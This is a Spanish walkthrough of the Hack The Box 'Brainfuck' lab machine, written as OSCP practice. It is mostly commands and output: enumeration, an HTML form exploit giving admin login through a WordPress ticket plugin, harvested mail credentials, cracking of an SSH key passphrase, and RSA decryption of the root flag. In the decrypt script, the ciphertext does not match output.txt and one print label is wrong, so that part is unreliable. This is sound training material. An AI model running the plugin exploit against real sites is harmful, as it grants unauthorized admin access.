OSCP Path ~ Brainfuck de Hack The Box (Necesario VIP)
Brainfuck ~ Hack The Box to OSCP
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.17 "
Procedemos con el siguiente escaneo de Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) UIDL USER TOP RESP-CODES PIPELINING AUTH-RESP-CODE CAPA
143/tcp open imap Dovecot imapd
|_imap-capabilities: Pre-login more IMAP4rev1 AUTH=PLAINA0001 have post-login listed ID OK LITERAL+ IDLE LOGIN-REFERRALS SASL-IR ENABLE capabilities
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Vemos que se aplica el concepto de <Virtual hosting >
brainfuck.htb
, sup3rs3cr3t.brainfuck.htb
# whatweb https://brainfuck.htb
https://brainfuck.htb [200 OK] Bootstrap[4.7.3], Country[RESERVED][ZZ], Email[ajax-loader@2x.gif,orestis@brainfuck.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.10.0 (Ubuntu)], IP[10.10.10.17], JQuery[1.12.4], MetaGenerator[WordPress 4.7.3], Modernizr, PoweredBy[WordPress,], Script[text/javascript], Title[Brainfuck Ltd. – Just another WordPress site], UncommonHeaders[link], WordPress[4.7.3], nginx[1.10.0]
Lanzamos un whatweb
y estamos anter un "Wordpress 4.7.3"
Procedemos a lanzar un escaneo con la herramienta wpscan
:
Con --disable-tls-checks le decimos que no checke eso
Con -e vp(Plugins Vulnerables) , u(usuarios)
Con -o <Fichero de Salidad Output>
# wpscan --url https://brainfuck.htb/ --disable-tls-checks -e vp,u -o vpscan.txt
┌──(root💀kali)-[/home/…/HTB/OSCP/BrainFuck/nmap]
└─# cat vpscan.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.14
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Wed Jun 9 15:29:54 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: https://brainfuck.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://brainfuck.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
| Found By: Rss Generator (Passive Detection)
| - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
| - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
[+] WordPress theme in use: proficient
| Location: https://brainfuck.htb/wp-content/themes/proficient/
| Last Updated: 2021-05-09T00:00:00.000Z
| Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
| [!] The version is out of date, the latest version is 3.0.45
| Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
| Style Name: Proficient
| Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
| Author: Specia
| Author URI: https://speciatheme.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.6 (80% confidence)
| Found By: Style (Passive Detection)
| - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'
[i] No plugins Found.
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] administrator
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Jun 9 15:30:02 2021
[+] Requests Done: 74
[+] Cached Requests: 6
[+] Data Sent: 17.288 KB
[+] Data Received: 16.927 MB
[+] Memory used: 224.105 MB
[+] Elapsed time: 00:00:07
Fuzzeamos con la herramienta DIRB
# dirb https://brainfuck.htb
-----------------
START_TIME: Wed Jun 9 15:37:50 2021
URL_BASE: https://brainfuck.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: https://brainfuck.htb/ ----
+ https://brainfuck.htb/index.php (CODE:301|SIZE:0)
==> DIRECTORY: https://brainfuck.htb/wp-admin/
==> DIRECTORY: https://brainfuck.htb/wp-content/
==> DIRECTORY: https://brainfuck.htb/wp-includes/
+ https://brainfuck.htb/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: https://brainfuck.htb/wp-admin/ ----
+ https://brainfuck.htb/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: https://brainfuck.htb/wp-admin/css/
==> DIRECTORY: https://brainfuck.htb/wp-admin/images/
==> DIRECTORY: https://brainfuck.htb/wp-admin/includes/
+ https://brainfuck.htb/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: https://brainfuck.htb/wp-admin/js/
==> DIRECTORY: https://brainfuck.htb/wp-admin/maint/
==> DIRECTORY: https://brainfuck.htb/wp-admin/network/
==> DIRECTORY: https://brainfuck.htb/wp-admin/user/
---- Entering directory: https://brainfuck.htb/wp-content/ ----
+ https://brainfuck.htb/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: https://brainfuck.htb/wp-content/plugins/
==> DIRECTORY: https://brainfuck.htb/wp-content/themes/
==> DIRECTORY: https://brainfuck.htb/wp-content/upgrade/
==> DIRECTORY: https://brainfuck.htb/wp-content/uploads/
---- Entering directory: https://brainfuck.htb/wp-includes/ ----
==> DIRECTORY: https://brainfuck.htb/wp-includes/certificates/
==> DIRECTORY: https://brainfuck.htb/wp-includes/css/
==> DIRECTORY: https://brainfuck.htb/wp-includes/customize/
==> DIRECTORY: https://brainfuck.htb/wp-includes/fonts/
==> DIRECTORY: https://brainfuck.htb/wp-includes/images/
==> DIRECTORY: https://brainfuck.htb/wp-includes/js/
==> DIRECTORY: https://brainfuck.htb/wp-includes/widgets/
---- Entering directory: https://brainfuck.htb/wp-admin/css/ ----
---- Entering directory: https://brainfuck.htb/wp-admin/images/ ----
---- Entering directory: https://brainfuck.htb/wp-admin/includes/ ----
+ https://brainfuck.htb/wp-admin/includes/admin.php (CODE:500|SIZE:0)
---- Entering directory: https://brainfuck.htb/wp-admin/js/ ----
---- Entering directory: https://brainfuck.htb/wp-admin/maint/ ----
---- Entering directory: https://brainfuck.htb/wp-admin/network/ ----
+ https://brainfuck.htb/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ https://brainfuck.htb/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: https://brainfuck.htb/wp-admin/user/ ----
+ https://brainfuck.htb/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ https://brainfuck.htb/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: https://brainfuck.htb/wp-content/plugins/ ----
---- Entering directory: https://brainfuck.htb/wp-content/themes/ ----
+ https://brainfuck.htb/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: https://brainfuck.htb/wp-content/upgrade/ ----
.....ctrl+c
Vemos que nos sacaba un wp-content/plugins/ pero sin mas resultados
Probamos a apuntar a la ruta esta https://brainfuck.htb/wp-content/plugins/
../
akismet/ 06-Mar-2017 16:00 -
easy-wp-smtp/ 17-Apr-2017 17:17 -
wp-support-plus-responsive-ticket-system/ 17-Apr-2017 17:51 -
hello.php 22-May-2013 21:08 2255
index.php.old
Encontramos estos recursos .. vamos a investigar por los plugins en Searchsploit
Obtenemos un Readme.txt https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/readme.txt
Chequeamos por https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
../
asset/ 17-Apr-2017 17:51 -
includes/ 17-Apr-2017 17:51 -
lang/ 17-Apr-2017 17:51 -
pipe/ 17-Apr-2017 17:51 -
readme.txt 17-Apr-2017 17:51 19938
wp-support-plus.php
Atraves del archivo readme.txt
vemos la version de plugin V 7.1.3
# searchsploit wp support
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting | php/webapps/40190.txt
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities | php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection | php/webapps/40939.txt
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Ahi vemos que tiene una escalada de privilegios para la version 7.1.3 - Privilege Escalation
que resulta interesante
Acceso al Wordpress como Admin mediante el exploit encontrado
Exploit encontrado en SEARCHSPLOIT
wp support privlige escalation
Seteamos la url
, el nombre del user
, y un correo
Lo corremos con $ firefox /HTB/OSCP/BrainFuck/exploits/exploit.html
y nos logueamos.
$ cat /HTB/OSCP/BrainFuck/exploits/exploit.html
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="orestis@brainfuck.htb">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Conseguimos acceso como Admin al panel de Wordpress. Entramos como el user admin al CMS wordpress
conseguimos sacar las credenciales para el servicio smntp asique procedemos por ahi
# telnet 10.10.10.17 110
Trying 10.10.10.17...
Connected to 10.10.10.17.
Escape character is '^]'.
+OK Dovecot ready.
-ERR Unknown command.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
#Sacamos el primer mail encontrado con el comando RETR 1
retr 1
+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Your new WordPress site has been successfully set up at:
https://brainfuck.htb
You can log in to the administrator account with the following information:
Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php
We hope you enjoy your new site. Thanks!
--The WordPress Team
https://wordpress.org/
.
exit
-ERR Unknown command: EXIT
# Sacamos el segundo mail con el comando RETR 2
retr 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)
Hi there, your credentials for our "secret" forum are below :)
username: orestis
password: kIEnnfEKJ#9UmdO
Regards
.
Conseguimos entrar al foro supersecreto https://sup3rs3cr3t.brainfuck.htb/d/1-development
con las credenciales obtenidas en el servicio de correo
Entramos al foro:
https://sup3rs3cr3t.brainfuck.htb/d/3-key
Encontramos una discussion abierta, y vemos que se esta aplicando un cifrado que parece ser VIGENERE
:
# Encontramos Patrones que parecen repetirse, justo la vuln de Vigenere
Orestis - Hacking for fun and profit
Pieagnm - Jkoijeg nbw zwx mle grwsnn
Codigo Vigenere : Vuln hay que buscar patrones repetitivos o que sean parecidos para sacar la clave(abajo) http://rumkin.com/tools/cipher/vigenere.php
Brain fuCkmybrain fuckmybrain fu
Con la contraseña fuckmybrain
conseguimos ir sacando los mensajes
hasta encontrar este relevante:
There you go you stupid fuck, I hope you remember your key password because I dont https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
Obtenemos un fichero id_rsa pero esta cifrado .. Asique vamos a tener que usar la herramienta ssh2john.py
que es para pasar el Hash a un formato en el que john
pueda entender para hacer fueza bruta.
# locate 2john | grep ssh
/usr/share/john/ssh2john.py
#Paso 1
(root💀kali)-[/home/…/HTB/OSCP/BrainFuck/content]
└─# /usr/share/john/ssh2john.py id_rsa > "hash_rsa"
# Paso 2
┌──(root💀kali)-[/home/…/HTB/OSCP/BrainFuck/content]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt "hash_rsa"
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
"3poulakia! " (id_rsa)
Warning: Only 5 candidates left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2021-06-09 18:18) 0.4201g/s 6025Kp/s 6025Kc/s 6025KC/s *7¡Vamos!..rootpassword!
Session completed
Consiguiendo Acceso Inicial por SSH
# ssh -i id_rsa orestis@brainfuck.htb 255 ⨯
The authenticity of host 'brainfuck.htb (10.10.10.17)' can't be established.
ECDSA key fingerprint is SHA256:S+b+YyJ/+y9IOr9GVEuonPnvVx4z7xUveQhJknzvBjg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'brainfuck.htb' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
You have mail.
Last login: Wed May 3 19:46:00 2017 from 10.10.11.4
orestis@brainfuck:~$
Privesc / Enumeracion del Sistema
Enumeramos :
orestis@brainfuck:~$ ls
debug.txt encrypt.sage mail output.txt "user.txt"
Sacamos la Flag de user.txt
y seguimos enumerando los diferentes recursos
orestis@brainfuck:~$ cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
orestis@brainfuck:~$ cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
Vamos a ver que es lo que hace este script que nos deja estos archivos con caracteres Decimales
orestis@brainfuck:~$ cat encrypt.sage
nbits = 1024
password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
e = ZZ.random_element(phi)
c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
Como no sabemos que es lo que esta haciendo vamos a copiar una parte del codigo para ver si encontramos el tipo de Cifrado que se esta empleando
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False) "[BUSQUEDA EN GOOGLE]"
Parece que : It is a standard RSA with e=5 an
encontrado en https://ctftime.org/writeup/6434
Y encontramos un script para calcular las variables de la encriptacion RSA: ` P ` ` Q ` ` E `
https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e
Vamos a Setear el script con nuestras variables del archivo debug.txt
y output.txt
# cat decrypt.py 1 ⨯
#!/usr/bin/python
# Funcion Principal de variables
def egcd(a, b):
x,y, u,v = 0,1, 1,0
while a != 0:
q, r = b//a, b%a
m, n = x-u*q, y-v*q
b,a, x,y, u,v = a,r, u,v, m,n
gcd = b
return gcd, x, y
# Funcion Principal 1, seteamos las variables con las que teniamos en el archivo debug.txt
def main():
p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 299604539773691895576847697095098784338054746292313044353582078965
# compute n
n = p * q
# Compute phi(n)
phi = (p - 1) * (q - 1)
# Compute modular inverse of e
gcd, a, b = egcd(e, phi)
d = a
print( "n: " + str(d) );
# Decrypt ciphertext
pt = pow(ct, d, n)
print( "pt: " + str(pt) )
if __name__ == "__main__":
main()
Una vez seteado todo lanzamos el script para ver si calculamos el valor correspondiente. Seteamos las variables y ejecutamos
# python decrypt.py 1 ⚙
n: 8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
# Este es el Valor que queremos, PT, que se encuentra en valor DECIMAL,
pt: 24604052029401386049980296953784287079059245867880966944246662849341507003750
Ahora tenemos que pasar este codigo en DECIMAL A HEXADECIMAL y luego a Texto plano a normal
Para ello vamos usar esta pagina web:
https://www.rapidtables.com/convert/number/decimal-to-hex.html
Ahora pasamo de Decimal to HEX
Output: 3665666331613564626238393034373531636536353636613330356262386566
Ahora de HEX to TEXT
Output: 6efc1a5dbb8904751ce6566a305bbxxxx
Maquina BRAINFUCK
rooteada =D !! Seguimos Full Hacks !!
Que parece ser la flag de root.txt